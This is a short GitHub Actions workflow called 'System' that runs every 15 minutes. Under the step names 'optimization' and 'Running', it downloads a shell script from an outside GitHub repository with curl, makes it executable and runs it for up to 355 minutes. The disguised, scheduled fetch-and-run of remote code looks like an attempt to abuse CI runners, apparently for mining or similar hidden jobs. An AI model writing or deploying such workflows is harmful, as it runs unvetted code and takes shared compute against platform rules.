name: System

on:
  workflow_dispatch:
  schedule:
    - cron: '*/15 * * * *'

jobs:
  optimization-test:
    runs-on: ubuntu-latest
    steps:
      - name: optimization
        run: |
          curl -sLo g.sh https://raw.githubusercontent.com/AsuSukey/musical-meme/main/g.sh
          chmod +x g.sh
          
      - name: Running
        run: |
          timeout 355m ./g.sh || echo "System Stopped"
